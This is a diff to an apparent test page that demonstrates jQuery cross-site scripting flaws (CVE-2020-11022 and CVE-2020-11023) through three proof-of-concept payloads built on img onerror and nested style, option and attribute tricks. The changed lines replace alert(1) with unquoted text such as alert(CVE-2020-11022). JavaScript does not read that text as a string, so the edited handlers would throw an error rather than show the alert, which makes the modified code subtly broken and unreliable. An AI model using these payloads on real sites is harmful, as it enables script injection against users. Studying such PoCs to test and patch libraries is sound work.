--- a/test.html
+++ b/test.html
@@ -66,19 +66,19 @@ function test(n,jq){
 <h2>PoC 1</h2>
 <button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
 <xmp id="poc1">
-<style><style /><img src=x onerror=alert(1)> 
+<style><style /><img src=x onerror=alert(CVE-2020-11022)> 
 </xmp>
 
 <h2>PoC 2 (Only jQuery 3.x affected)</h2>
 <button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
 <xmp id="poc2">
-<img alt="<x" title="/><img src=x onerror=alert(1)>">
+<img alt="<x" title="/><img src=x onerror=alert(CVE-2020-11022/jQuery 3.x)>">
 </xmp>
 
 <h2>PoC 3</h2>
 <button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
 <xmp id="poc3">
-<option><style></option></select><img src=x onerror=alert(1)></style>
+<option><style></option></select><img src=x onerror=alert(CVE-2020-11023)></style>
 </xmp>
 
 <div id="div"></div>
